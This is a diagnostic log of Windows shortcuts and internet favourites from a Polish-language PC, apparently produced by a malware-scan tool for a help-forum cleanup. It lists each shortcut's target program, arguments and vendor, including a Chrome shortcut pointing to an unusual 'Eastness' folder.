Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ACD Systems\ACDSee 6.0.lnk -> C:\Windows\Installer\{271B64EE-3E1B-4381-A8FE-012390050492}\ACDSeePMShortcut_FD88D5011F0A4DA4A13A6437411EE0C3.exe (InstallShield Software Corp.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ACD Systems\ACDSee Device Detector 2.0.lnk -> C:\Windows\Installer\{271B64EE-3E1B-4381-A8FE-012390050492}\DevDetectPMShortcut.exe (InstallShield Software Corp.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk -> C:\Windows\System32\calc.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk -> C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk -> C:\Windows\System32\mspaint.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk -> C:\Windows\System32\mstsc.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk -> C:\Windows\System32\SnippingTool.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sound Recorder.lnk -> C:\Windows\System32\SoundRecorder.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Steps Recorder.lnk -> C:\Windows\System32\psr.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk -> C:\Windows\System32\StikyNot.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Fax and Scan.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk -> C:\Program Files\Windows NT\Accessories\wordpad.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\XPS Viewer.lnk -> C:\Windows\System32\xpsrchvw.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Windows Journal.lnk -> C:\Program Files\Windows Journal\Journal.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk -> C:\Windows\System32\charmap.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\KTR\ZAPIECZETUJ-AUDIT.lnk -> C:\ProgramData\KTR\startsysprep-AUDIT.cmd ()
Shortcut: C:\ProgramData\KTR\ZAPIECZETUJ-OOBE.lnk -> C:\ProgramData\KTR\startsysprep-OOBE.cmd ()
Shortcut: C:\Users\Default\Desktop\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk -> C:\Users\Adam\Documents ()
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk -> C:\Users\Adam\Pictures ()
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk -> C:\Windows\explorer.exe,-30
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Help.lnk -> C:\Windows\HelpPane.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Windows.Defender.lnk -> C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk -> C:\Windows\System32\Magnify.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk -> C:\Windows\System32\Narrator.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk -> C:\Windows\System32\osk.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\01a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\02 - Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\02a - Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\03 - Computer Management.lnk -> C:\Windows\System32\compmgmt.msc ()
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\04 - Disk Management.lnk -> C:\Windows\System32\diskmgmt.msc ()
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk -> C:\Windows\System32\eventvwr.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk -> C:\Windows\System32\mblctr.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\4 - Control Panel.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation)
Shortcut: C:\Users\Public\Desktop\ACD FotoCanvas 3.0.lnk -> C:\Windows\Installer\{271B64EE-3E1B-4381-A8FE-012390050492}\FotoCanvasDesktopSho_FD88D5011F0A4DA4A13A6437411EE0C3.exe (InstallShield Software Corp.)
Shortcut: C:\Users\Public\Desktop\ACD FotoSlate 3.0.lnk -> C:\Windows\Installer\{271B64EE-3E1B-4381-A8FE-012390050492}\FotoSlateDesktopShor_FD88D5011F0A4DA4A13A6437411EE0C3.exe (InstallShield Software Corp.)
Shortcut: C:\Users\Public\Desktop\ACDSee 6.0.lnk -> C:\Windows\Installer\{271B64EE-3E1B-4381-A8FE-012390050492}\ACDSeeDesktopShortcu_FD88D5011F0A4DA4A13A6437411EE0C3.exe (InstallShield Software Corp.)
Shortcut: C:\Users\Public\Desktop\Acrobat Reader DC.lnk -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe (Adobe Systems Incorporated)
Shortcut: C:\Users\Public\Desktop\Alcohol 120%.lnk -> C:\Program Files (x86)\Alcohol Soft\Alcohol 120\Alcohol.exe (Alcohol Soft Development Team)
Shortcut: C:\Users\Public\Desktop\Avast Free Antivirus.lnk -> C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)
Shortcut: C:\Users\Public\Desktop\Avast SafeZone Browser.lnk -> C:\Program Files\AVAST Software\SZBrowser\launcher.exe (Avast Software)
Shortcut: C:\Users\Public\Desktop\AVG Konserwacja 1 kliknięciem.lnk -> C:\Program Files (x86)\AVG\AVG PC TuneUp\OneClick.exe (AVG Technologies)
Shortcut: C:\Users\Public\Desktop\AVG PC TuneUp 2015.lnk -> C:\Program Files (x86)\AVG\AVG PC TuneUp\Integrator.exe (AVG Technologies)
Shortcut: C:\Users\Public\Desktop\CCleaner.lnk -> C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
Shortcut: C:\Users\Public\Desktop\CDBurnerXP.lnk -> C:\Program Files\CDBurnerXP\cdbxpp.exe (Canneverbe Limited)
Shortcut: C:\Users\Public\Desktop\CPUID HWMonitor.lnk -> C:\Program Files\CPUID\HWMonitor\HWMonitor.exe (CPUID)
Shortcut: C:\Users\Public\Desktop\DAEMON Tools Lite.lnk -> C:\Program Files\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)
Shortcut: C:\Users\Public\Desktop\DriverToolkit.lnk -> C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe (Brak pliku)
Shortcut: C:\Users\Public\Desktop\EaseUS Partition Master 10.2.lnk -> C:\Program Files (x86)\EaseUS\EaseUS Partition Master 10.2\bin\EPMStartLoader.exe ()
Shortcut: C:\Users\Public\Desktop\EaseUS Todo Backup Free 8.2 .lnk -> C:\Program Files (x86)\EaseUS\Todo Backup\bin\Loader.exe (CHENGDU YIWO Tech Development Co., Ltd)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Earth.lnk -> C:\Program Files (x86)\Google\Google Earth\client\googleearth.exe (Google)
Shortcut: C:\Users\Public\Desktop\ipla.lnk -> C:\Program Files (x86)\ipla\ipla.exe (Cyfrowy Polsat S.A.)
Shortcut: C:\Users\Public\Desktop\mIRC.lnk -> C:\Users\Adam\Desktop\mirc.exe (mIRC Co. Ltd.)
Shortcut: C:\Users\Public\Desktop\Oracle VM VirtualBox.lnk -> C:\Program Files\Oracle\VirtualBox\VirtualBox.exe (Oracle Corporation)
Shortcut: C:\Users\Public\Desktop\Picasa 3.lnk -> C:\Program Files (x86)\Google\Picasa3\Picasa3.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Pro Evolution Soccer 2015.lnk -> F:\Pro Evolution Soccer 2015\PES2015.exe (Konami Digital Entertainment Co., Ltd.)
Shortcut: C:\Users\Public\Desktop\REACHit.lnk -> C:\Program Files (x86)\Lenovo\REACHit\REACHitAgent.exe (Lenovo)
Shortcut: C:\Users\Public\Desktop\ScanSpeeder.lnk -> C:\Program Files (x86)\ScanSpeeder\ScanSpeeder.exe (Nitro Logic)
Shortcut: C:\Users\Public\Desktop\Skype.lnk -> C:\Windows\Installer\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}\SkypeIcon.exe ()
Shortcut: C:\Users\Public\Desktop\VLC media player.lnk -> F:\VLC\vlc.exe (VideoLAN)
Shortcut: C:\Users\Public\Desktop\Winamp.lnk -> F:\Winamp\winamp.exe (Nullsoft, Inc.)




ShortcutWithArgument: C:\Users\Adam\Desktop\Dropbox.lnk -> C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc.) -> /home
ShortcutWithArgument: C:\Users\Adam\Desktop\IrfanView Thumbnails.lnk -> C:\Program Files (x86)\IrfanView\i_view32.exe (Irfan Skiljan) -> /thumbs
ShortcutWithArgument: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\REACHit Drive.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> /separate,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{2B3256D4-49AA-11D1-8429-0050AE509033}
ShortcutWithArgument: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IrfanView\IrfanView - Thumbnails.lnk -> C:\Program Files (x86)\IrfanView\i_view32.exe (Irfan Skiljan) -> /thumbs
ShortcutWithArgument: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation) -> /SendTo
ShortcutWithArgument: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\SendTo\Skype.lnk -> C:\Program Files (x86)\Skype\Phone\Skype.exe (Skype Technologies S.A.) -> /sendto:
ShortcutWithArgument: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - Network Connections.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
ShortcutWithArgument: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.DeviceManager
ShortcutWithArgument: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group3\06 - System.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.System
ShortcutWithArgument: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group3\08 - Power Options.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.PowerOptions
ShortcutWithArgument: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group3\10 - Programs and Features.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.ProgramsAndFeatures
ShortcutWithArgument: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> /e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
ShortcutWithArgument: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk -> C:\Windows\System32\Taskmgr.exe (Microsoft Corporation) -> /0
ShortcutWithArgument: C:\Users\Adam\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257}
ShortcutWithArgument: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation) -> /SendTo
ShortcutWithArgument: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - Network Connections.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
ShortcutWithArgument: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.DeviceManager
ShortcutWithArgument: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group3\06 - System.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.System
ShortcutWithArgument: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group3\08 - Power Options.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.PowerOptions
ShortcutWithArgument: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group3\10 - Programs and Features.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.ProgramsAndFeatures
ShortcutWithArgument: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> /e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
ShortcutWithArgument: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk -> C:\Windows\System32\Taskmgr.exe (Microsoft Corporation) -> /0
ShortcutWithArgument: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257}
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Search.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> -sta {C90FB8CA-3295-4462-A721-2935E83694BA}
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp\Winamp (Tryb awaryjny).lnk -> F:\Winamp\winamp.exe (Nullsoft, Inc.) -> /SAFE=1
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN\VLC media player - reset preferences and cache files.lnk -> F:\VLC\vlc.exe (VideoLAN) -> --reset-config --reset-plugins-cache vlc://quit
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN\VLC media player skinned.lnk -> F:\VLC\vlc.exe (VideoLAN) -> -Iskins
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Default Programs.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.DefaultPrograms
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Task Manager.lnk -> C:\Windows\System32\Taskmgr.exe (Microsoft Corporation) -> /7
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScanSpeeder 1.5.4\Uninstall ScanSpeeder 1.5.4.lnk -> C:\Program Files (x86)\ScanSpeeder\Uninstall-ScanSpeeder.exe (Nitro Logic) -> C:\Program Files (x86)\ScanSpeeder\SSEun.dat
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Picasa 3\Konfiguruj przeglądarkę zdjęć Picasa.lnk -> C:\Program Files (x86)\Google\Picasa3\PicasaPhotoViewer.exe (Google Inc.) -> /reconfig
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus\McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.163\McUICnt.exe (McAfee, Inc.) -> SecurityScanner.dll
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus\Odinstaluj.lnk -> C:\Program Files\McAfee Security Scan\uninstall.exe (McAfee, Inc.) -> C:\Program Files\McAfee Security Scan\3.11.163\McAfee.ico
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\DirectVobSub.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> "C:\Program Files (x86)\K-Lite Codec Pack\Filters\DirectVobSub64\vsfilter.dll",DirectVobSub
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Audio.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> "C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV64\lavaudio.ax",OpenConfiguration
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Splitter.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> "C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV64\lavsplitter.ax",OpenConfiguration
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Video.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> "C:\Program Files (x86)\K-Lite Codec Pack\Filters\LAV64\lavvideo.ax",OpenConfiguration
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\About Java.lnk -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\javacpl.exe (Oracle Corporation) -> -tab about
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Check For Updates.lnk -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\javacpl.exe (Oracle Corporation) -> -tab update
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Earth\Start Google Earth in DirectX mode.lnk -> C:\Program Files (x86)\Google\Google Earth\client\googleearth.exe (Google) ->  -setDX
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Earth\Start Google Earth in OpenGL mode.lnk -> C:\Program Files (x86)\Google\Google Earth\client\googleearth.exe (Google) ->  -setOGL
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Earth\Uninstall Google Earth.lnk -> C:\Windows\System32\msiexec.exe (Microsoft Corporation) -> /x {F6430171-B86B-4639-839E-374913E7911D}
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive\Google Docs.lnk -> C:\Program Files (x86)\Google\Drive\googledrivesync.exe (Google) -> --new_document
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive\Google Sheets.lnk -> C:\Program Files (x86)\Google\Drive\googledrivesync.exe (Google) -> --new_spreadsheet
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive\Google Slides.lnk -> C:\Program Files (x86)\Google\Drive\googledrivesync.exe (Google) -> --new_presentation
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox\Dropbox.lnk -> C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc.) -> /home
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Debugging Tools for Windows (x86)\Uninstall Debugging Tools for Windows (x86).lnk -> C:\Windows\System32\msiexec.exe (Microsoft Corporation) -> /x {300A2961-B2B5-4889-9CB9-5C2A570D08AD}
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard\Uninstall AMD Problem Report Wizard.lnk -> C:\Windows\SysWOW64\msiexec.exe (Microsoft Corporation) -> /x {62982254-B7DB-260F-FD16-1A855C192EA7}
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk -> C:\Windows\System32\compmgmt.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk -> C:\Windows\System32\eventvwr.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk -> C:\Windows\System32\perfmon.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Resource Monitor.lnk -> C:\Windows\System32\perfmon.exe (Microsoft Corporation) -> /res
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk -> C:\Windows\System32\taskschd.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Media Player.lnk -> C:\Program Files (x86)\Windows Media Player\wmplayer.exe (Microsoft Corporation) -> /prefetch:1
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Speech Recognition.lnk -> C:\Windows\Speech\Common\sapisvr.exe (Microsoft Corporation) -> -SpeechUX
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation) -> /SendTo
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - Network Connections.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.DeviceManager
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\06 - System.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.System
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\08 - Power Options.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.PowerOptions
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\10 - Programs and Features.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.ProgramsAndFeatures
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> /e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk -> C:\Windows\System32\Taskmgr.exe (Microsoft Corporation) -> /0
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257}
ShortcutWithArgument: C:\Users\Public\Desktop\Google Docs.lnk -> C:\Program Files (x86)\Google\Drive\googledrivesync.exe (Google) -> --new_document
ShortcutWithArgument: C:\Users\Public\Desktop\Google Sheets.lnk -> C:\Program Files (x86)\Google\Drive\googledrivesync.exe (Google) -> --new_spreadsheet
ShortcutWithArgument: C:\Users\Public\Desktop\Google Slides.lnk -> C:\Program Files (x86)\Google\Drive\googledrivesync.exe (Google) -> --new_presentation
ShortcutWithArgument: C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.163\McUICnt.exe (McAfee, Inc.) -> SecurityScanner.dll


InternetURL: C:\Users\Adam\Favorites\Bing.url -> URL: hxxp://go.microsoft.com/fwlink/p/?LinkId=255142
InternetURL: C:\Users\Adam\Desktop\Core Temp Gadget & Addons.url -> URL: hxxp://www.alcpu.com/CoreTemp/addons.html
InternetURL: C:\Users\Administrator\Favorites\Bing.url -> URL: hxxp://go.microsoft.com/fwlink/p/?LinkId=255142
InternetURL: C:\ProgramData\Unigine\Heaven40\unigine.url -> URL: hxxp://unigine.com/
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MSI\MSI GamingApp\MSI Website.url -> URL: hxxp://www.msi.com/index.php
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Get Help.url -> URL: hxxp://java.com/help
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.url -> URL: hxxp://java.com/
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EaseUS Todo Backup Free 8.2\EaseUS Todo Backup Free 8.2  Pomoc.url -> URL: hxxp://www.easeus.com/support/todo-backup/
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EaseUS Todo Backup Free 8.2\Strona WWW programu OdwiedĹş EaseUS.url -> URL: hxxp://www.easeus.com/backup-software/
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EaseUS Partition Master 10.2\EaseUS Partition Master 10.2 Help.url -> URL: hxxp://www.easeus.com/support/partition-master/
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EaseUS Partition Master 10.2\Strona WWW programu OdwiedĹş EaseUS.url -> URL: hxxp://www.easeus.com/partition-manager/
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox\Dropbox Website.URL ->
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner Homepage.url -> URL: hxxp://www.piriform.com/ccleaner

==================== Koniec  Shortcut.txt =============================
]

